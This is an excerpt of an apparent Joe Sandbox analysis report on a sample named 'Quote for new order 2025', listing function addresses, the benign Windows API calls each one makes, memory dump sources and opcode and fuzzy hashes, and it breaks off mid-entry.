                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 3121 2a5fad0-2a5fb36 3122 2a5fb41-2a5fb48 3121->3122 3123 2a5fb38-2a5fb3e 3121->3123 3124 2a5fb53-2a5fbf2 CreateWindowExW 3122->3124 3125 2a5fb4a-2a5fb50 3122->3125 3123->3122 3127 2a5fbf4-2a5fbfa 3124->3127 3128 2a5fbfb-2a5fc33 3124->3128 3125->3124 3127->3128 3132 2a5fc35-2a5fc38 3128->3132 3133 2a5fc40 3128->3133 3132->3133
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A5FBE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: 34208b47cde3f89c3eec5b0a3d3ff4a50526e7f51b398574d2f9abd9dd96051d
                                                                                                                                                        • Instruction ID: d1c98ecd5c9e71c0837bee49c514034e1df67576a9006c12b9e5bf4f813d2dc9
                                                                                                                                                        • Opcode Fuzzy Hash: 34208b47cde3f89c3eec5b0a3d3ff4a50526e7f51b398574d2f9abd9dd96051d
                                                                                                                                                        • Instruction Fuzzy Hash: 6441C0B1D00359DFDB14CFA9C984ADEBBB5FF48314F24812AE818AB210D7759885CF91
                                                                                                                                                        Function 0759001D Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075900D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: 6dc4370e63c4ba1fb3e2af811e37b07fc163fe155a6ae34f53ec86f7e8f37a40
                                                                                                                                                        • Instruction ID: eb94eac244ad521a88f9c7deff23560444a44a604f2bce945b2e119d1044f71f
                                                                                                                                                        • Opcode Fuzzy Hash: 6dc4370e63c4ba1fb3e2af811e37b07fc163fe155a6ae34f53ec86f7e8f37a40
                                                                                                                                                        • Instruction Fuzzy Hash: 643104B59053499FDB11CFA9D880ADEBBF4FF48310F58842AE818A7251D335A945CFA4
                                                                                                                                                        Function 07590040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 075900D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DrawText
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2175133113-0
                                                                                                                                                        • Opcode ID: c6c63b117113fd619bb7b3c2bcc475531c3e780002055b21f90b79c966a0857b
                                                                                                                                                        • Instruction ID: aac49c4d5caa4812bf91bc26b11d15b010b9ee8747a874d04effb15fa474f51b
                                                                                                                                                        • Opcode Fuzzy Hash: c6c63b117113fd619bb7b3c2bcc475531c3e780002055b21f90b79c966a0857b
                                                                                                                                                        • Instruction Fuzzy Hash: 4C21D2B5D0034A9FDB10CF9AD884ADEFBF5FB48320F54842AE819A7250D775A944CFA4
                                                                                                                                                        Function 0759F340 Relevance: 1.6, APIs: 1, Instructions: 67windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0759F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 2cb0a789c1b8c5cb403839cb748f9d164b76985b6af9b8daad2f24042fbc57e9
                                                                                                                                                        • Instruction ID: f4aa37c5ad003fad20d8fc6c44c09d95a8f05b2385687a26e287bfac2198ac89
                                                                                                                                                        • Opcode Fuzzy Hash: 2cb0a789c1b8c5cb403839cb748f9d164b76985b6af9b8daad2f24042fbc57e9
                                                                                                                                                        • Instruction Fuzzy Hash: 52213D718083899FDB11CF99C8457DEBFF4EF49320F15849AD854A7252D338A948CFA5
                                                                                                                                                        Function 02A57780 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 4a69d73a5598b43302b950c22ec549bd81f27ae983a678e37d82900461b36b6b
                                                                                                                                                        • Instruction ID: 8425910253ae4eedca6d2a11947803f7387dab021410d4019dff1d8231def5cd
                                                                                                                                                        • Opcode Fuzzy Hash: 4a69d73a5598b43302b950c22ec549bd81f27ae983a678e37d82900461b36b6b
                                                                                                                                                        • Instruction Fuzzy Hash: 5321E5B5900258DFDB10CFAAD984AEEFBF5FB48320F14841AE954A3250D379A944CFA5
                                                                                                                                                        Function 02A57788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5780F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                        • Opcode ID: 90526d290a32159a8f5685aef2eb5e08a24f7448ef05ac407b97d411cdf0449c
                                                                                                                                                        • Instruction ID: b98191ed95522ba6ba68bf3b3f60f4a183ba7964f52cfab66adeb351487c96b2
                                                                                                                                                        • Opcode Fuzzy Hash: 90526d290a32159a8f5685aef2eb5e08a24f7448ef05ac407b97d411cdf0449c
                                                                                                                                                        • Instruction Fuzzy Hash: 9721E3B59002589FDB10CFAAD984ADEFBF4EB48320F14841AE914A3210D378A944CFA5
                                                                                                                                                        Function 0759FCF8 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 0759FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: cfef675063702f86a91914aad696f596e191053e4ee4478a7442ec020da3105c
                                                                                                                                                        • Instruction ID: 467815edffb9faba38544dcc8a22dc8a909b04269556a6b0aec618e2613e30f7
                                                                                                                                                        • Opcode Fuzzy Hash: cfef675063702f86a91914aad696f596e191053e4ee4478a7442ec020da3105c
                                                                                                                                                        • Instruction Fuzzy Hash: 942133B28003599FDB10CF9AD444ADEBBF8FB08320F00842AE958A7291C378A544CFA5
                                                                                                                                                        Function 0759FF22 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0759FF8D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: b32226b50f3a21a3867fbed6336cb4b590b60beb4e2b2c3cefeb8ee1fbd37354
                                                                                                                                                        • Instruction ID: ba8b7af04b149f4a083c29e95b293506a3083315afca5237c860b5b1545d9095
                                                                                                                                                        • Opcode Fuzzy Hash: b32226b50f3a21a3867fbed6336cb4b590b60beb4e2b2c3cefeb8ee1fbd37354
                                                                                                                                                        • Instruction Fuzzy Hash: 591126B58043499FDB10DF9AD444BDEFBF8FB48320F10842AE858A3240D378A584CFA5
                                                                                                                                                        Function 0759FD00 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 0759FD68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeek
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2222842502-0
                                                                                                                                                        • Opcode ID: 4d8fd773560d0f2293562dc29f1e3138ae09d99cf0bc898e18b37f2a81e23c56
                                                                                                                                                        • Instruction ID: fa433a4b824daa837cfc3eabcfab3ab48860b1b7daa040afc0af678d4fdbf7cb
                                                                                                                                                        • Opcode Fuzzy Hash: 4d8fd773560d0f2293562dc29f1e3138ae09d99cf0bc898e18b37f2a81e23c56
                                                                                                                                                        • Instruction Fuzzy Hash: 5511F3B5800249DFDB10CF9AD944BDEFBF8FB48320F10842AE958A7251C378A544CFA5
                                                                                                                                                        Function 0759FF28 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 0759FF8D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                                        • Opcode ID: 89a84dd8990360c71c8efa95d2bce6892bc414b29e94c6f8559800c2e468b6fb
                                                                                                                                                        • Instruction ID: a6730f976aa94fa1a45251c7c023000b882464248e8d36e96247466a5a931ba7
                                                                                                                                                        • Opcode Fuzzy Hash: 89a84dd8990360c71c8efa95d2bce6892bc414b29e94c6f8559800c2e468b6fb
                                                                                                                                                        • Instruction Fuzzy Hash: 0011F3B18042499FDB10CF9AD844BDEFBF8FB48320F10842AE858A3240D378A584CFA5
                                                                                                                                                        Function 0759F368 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0759F3C5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3540920710.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_7590000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                        • Opcode ID: 59d3272365dbe9a3203951de2a60fae9d69a71a19fd16d28458dd12554426ab3
                                                                                                                                                        • Instruction ID: b593e592a663afae693eb3d27df156ce35f9b5337d3843742c35bec7eee2ea9d
                                                                                                                                                        • Opcode Fuzzy Hash: 59d3272365dbe9a3203951de2a60fae9d69a71a19fd16d28458dd12554426ab3
                                                                                                                                                        • Instruction Fuzzy Hash: F711F5B5800349DFDB10CF9AC845BDEFBF8EB48324F10842AE954A7651D379A584CFA5
                                                                                                                                                        Function 075C0840 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: d14842629ff08fa8cffb9bc571894d1620fe619992de5dc8741975146ed0fc3d
                                                                                                                                                        • Instruction ID: 9475e3374e9593076334ca60b9056498d3bf8efe4636d2a5235342da032edb93
                                                                                                                                                        • Opcode Fuzzy Hash: d14842629ff08fa8cffb9bc571894d1620fe619992de5dc8741975146ed0fc3d
                                                                                                                                                        • Instruction Fuzzy Hash: A51110B1C04248CFDB10CF9AD944BCEFBF4EB48324F10842AD868A7250C378A544CFA5
                                                                                                                                                        Function 075C5840 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 9bac76353d5a76978c282c119a2e436a89f28be2e1798019142a55ad3f3ef9ec
                                                                                                                                                        • Instruction ID: 1769a0f84f57d7fd2ee3d478154fafd4eaf5cfd2ebe72c2e7c2fcbaaf3f7eccf
                                                                                                                                                        • Opcode Fuzzy Hash: 9bac76353d5a76978c282c119a2e436a89f28be2e1798019142a55ad3f3ef9ec
                                                                                                                                                        • Instruction Fuzzy Hash: C61125B1C042488FDB10CF9AD544BDEFBF4EB48324F24842AD858A7210D378A544CFA5
                                                                                                                                                        Function 02A5D6C8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 02A5D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529658313.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_2a50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 0904ac44ef9027299f369f2277109fb76c3189988ba4fd1b687f7577a4150b9d
                                                                                                                                                        • Instruction ID: 58f8897307d28974267d3fe35d4e3b3ab0cb91924d3fd3c1bd5eace6a4142c99
                                                                                                                                                        • Opcode Fuzzy Hash: 0904ac44ef9027299f369f2277109fb76c3189988ba4fd1b687f7577a4150b9d
                                                                                                                                                        • Instruction Fuzzy Hash: 271110B5C00659CFCB10CF9AC444ADFFBF4EB88324F10842AD828A7210D379A585CFA5
                                                                                                                                                        Function 075C0848 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: ff55b489a4feac2d9b5d0045cef5cade15d5155548a8ec97c86410da503823ab
                                                                                                                                                        • Instruction ID: 9f6ee7d9425cb53cbc726a4f5b8c556cd6aa200fb11a343b026a8ca2a1a45fde
                                                                                                                                                        • Opcode Fuzzy Hash: ff55b489a4feac2d9b5d0045cef5cade15d5155548a8ec97c86410da503823ab
                                                                                                                                                        • Instruction Fuzzy Hash: 44110DB1C04259CFDB10DF9AD948BCEFBF4EB48324F10842AE868A3250D378A544CFA5
                                                                                                                                                        Function 075C5848 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3541169261.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_75c0000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DispatchMessage
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2061451462-0
                                                                                                                                                        • Opcode ID: 6fb361f82832642abc541583455fef34f6eff8f155ab0ceefd2ad1d185789559
                                                                                                                                                        • Instruction ID: 57be0734af33f52724bd91dbfcc91a87e1589451c7f92ea9aefbce5d4642701f
                                                                                                                                                        • Opcode Fuzzy Hash: 6fb361f82832642abc541583455fef34f6eff8f155ab0ceefd2ad1d185789559
                                                                                                                                                        • Instruction Fuzzy Hash: 2D11D0B5C04659CFDB10DF9AD544BDEFBF4EB48324F20842AD868A7210D379A544CFA5
                                                                                                                                                        Function 010AD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 438e11a114fdde17ff64413bdc0d4aca4b7a00fe3fcbfae5a6e4eb30a61dd639
                                                                                                                                                        • Instruction ID: 8b0e6655aa91f19e9f21d9f42a576d9c3286752aa15db0e6fb895d5d7f5a79cb
                                                                                                                                                        • Opcode Fuzzy Hash: 438e11a114fdde17ff64413bdc0d4aca4b7a00fe3fcbfae5a6e4eb30a61dd639
                                                                                                                                                        • Instruction Fuzzy Hash: 6E214571500200DFCB05DFA8C9C4B2ABFA5FB88318F6481A9E9890B656C336D446CBA2
                                                                                                                                                        Function 010BD488 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a9218c5b55a65113a674a678e51e11479224689fc716892293d4835d843fc70d
                                                                                                                                                        • Instruction ID: 078fda11c2169acfac59c01fdd8b694b63079db756e9d49e663a51c2f811b85d
                                                                                                                                                        • Opcode Fuzzy Hash: a9218c5b55a65113a674a678e51e11479224689fc716892293d4835d843fc70d
                                                                                                                                                        • Instruction Fuzzy Hash: 2A21F6B5504244DFDB01DF58D9C4B6AFBA5FB8432CF24C5AAD8894B246C33AE446CB62
                                                                                                                                                        Function 010BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                                        • Instruction ID: d19611b9d146c5d2974e4616c879b4fedd6c6e7ce0d84e18114e766d8b125fff
                                                                                                                                                        • Opcode Fuzzy Hash: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                                        • Instruction Fuzzy Hash: 70212271614200DFCB15DF98D9C4B6AFFA5EB88318F20C5ADE98A4B256C33AD447CB61
                                                                                                                                                        Function 010BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                                        • Instruction ID: 800924b0d7ab34c0ced07d83aeeaeea3825d5a0a2437e36d77bc8d9471d0ff5a
                                                                                                                                                        • Opcode Fuzzy Hash: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                                        • Instruction Fuzzy Hash: 2B212971504240EFDB05DF98D5C0B6AFFA5FB94328F20C5ADD9894B256C336D846CB61
                                                                                                                                                        Function 010BD2D4 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 026d74a461ad3600f3741cba291cc332f38f818c115ffc99a091f5bd4c39d833
                                                                                                                                                        • Instruction ID: 3f8463db40b7000509848305ebf8fdab320ae158bcc5f7778e7741e4bca90f34
                                                                                                                                                        • Opcode Fuzzy Hash: 026d74a461ad3600f3741cba291cc332f38f818c115ffc99a091f5bd4c39d833
                                                                                                                                                        • Instruction Fuzzy Hash: A72135B1505240DFD705DF58D6C0B6AFBA4FB94B18F24C669D8894B246C33AD806C7A1
                                                                                                                                                        Function 010BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                                        • Instruction ID: dee948e5d5e0957d1fc3baed9601f58d4d2648c21173e58b71d4bbb22aa177f9
                                                                                                                                                        • Opcode Fuzzy Hash: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                                        • Instruction Fuzzy Hash: 772153755083809FDB12CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                                                                                                                                                        Function 010AD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3528976256.00000000010AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010AD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10ad000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction ID: ca8544fef9ccd8b8677e26b90b0692b6bb4558e7eccb38f9ed43e55e39733e93
                                                                                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                        • Instruction Fuzzy Hash: 6B110376404240CFCB02CF94D5C4B16BFB1FB84318F24C6A9D9890B657C33AD45ACBA1
                                                                                                                                                        Function 010BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction ID: f788f36ded3ac9f4b2af8f4426584ea6d00ec9979e21914e9cd217da09d2a933
                                                                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                        • Instruction Fuzzy Hash: EC11BB75504280DFDB02CF54C5C4B55FFA1FB84228F24C6AAD8894B296C33AD80ACB61
                                                                                                                                                        Function 010BD483 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000B.00000002.3529090688.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_11_2_10bd000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
